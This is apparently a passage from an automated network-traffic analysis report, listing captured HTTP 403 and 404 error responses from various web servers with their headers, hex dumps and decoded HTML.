6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Jul 2023 19:53:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 2X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 27 Jul 2023 19:53:56 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 3X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:57 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BTY8SeJn4pghZTMyODE3NjRiM2I4MDE2MjEyZjg0ZTVhZjE4YTMx;Path=/X-Contextid: 5h56RCCV/9wd0f6boData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:57 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BQw0dKTAn9ESYTM3MWEzZTIxMWNhMGUxODUxYmEwYmUwODkzN2Ux;Path=/X-Contextid: XSU3O2qq/gscSYUnxData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:57 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMepe296fMW5KF9VDXVotyUV,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1690487637.58818672802116314X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 google
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:53:57 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:58 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Thu, 27 Jul 2023 19:53:58 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:58 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:59 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
